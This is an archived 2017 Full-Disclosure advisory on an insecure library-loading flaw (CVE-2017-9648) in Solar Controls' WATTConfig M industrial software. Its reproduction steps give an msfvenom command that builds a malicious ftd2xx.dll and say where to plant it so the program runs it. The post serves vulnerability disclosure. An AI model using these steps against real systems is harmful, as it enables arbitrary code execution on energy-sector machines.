lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAB8+WF2zxkUTR4Z-O3B7u=ueJN-zxNQM5Wt5i_SgzOdQOfqFkw@mail.gmail.com>
Date: Fri, 1 Sep 2017 05:06:52 +0530
From: Karn Ganeshen <karnganeshen@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] [ICS] Solar Controls WATTConfig M Software – Insecure Library Loading Allows Code Execution

Vendor: Solar Controls
Equipment: WATTConfig M Software
Vulnerability: Uncontrolled Search Path Element

Advisory URL:
https://ipositivesecurity.com/2017/09/01/ics-solar-controls-wattconfig-m-software-insecure-library-loading-allows-code-execution/

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-222-03

------------------------
AFFECTED PRODUCTS
------------------------
The following versions of Solar Controls’ WATTConfig M Software for Windows
2.5.10 for M SSR/MAX PLCs are affected:

WATTConfig M Software, Version 2.5.10.1 and prior.

------------------------
BACKGROUND
------------------------
Critical Infrastructure Sector(s): Energy
Countries/Areas Deployed: Unknown
Company Headquarters Location: Czech Republic

------------------------
IMPACT
------------------------
Successful exploitation of this vulnerability may allow arbitrary code
execution.

------------------------
VULNERABILITY OVERVIEW
------------------------

UNCONTROLLED SEARCH PATH ELEMENT CWE-427
An uncontrolled search path element has been identified, which could allow
an attacker to execute arbitrary code on a target system using a malicious
DLL file.

CVE-2017-9648 has been assigned to this vulnerability. A CVSS v3 base score
of 7.8 has been assigned; the CVSS vector string is
(AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H).

------------------------
Missing Libraries
------------------------
ftd2xx.dll

------------------------
Application Executables (that look for missing DLL)
------------------------
WattConfigM.exe

------------------------
Steps to reproduce
------------------------
1. Generate a dll payload
msfvenom –p windows/exec cmd=calc.exe –f dll –o ftd2xx.dll

2. Place this dll in any directory defined in the PATH environment variable
C:\app-folder-RW\

3. Run WattConfigM.exe -> calc.exe executes


+++++
Best Regards,
Karn Ganeshen

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ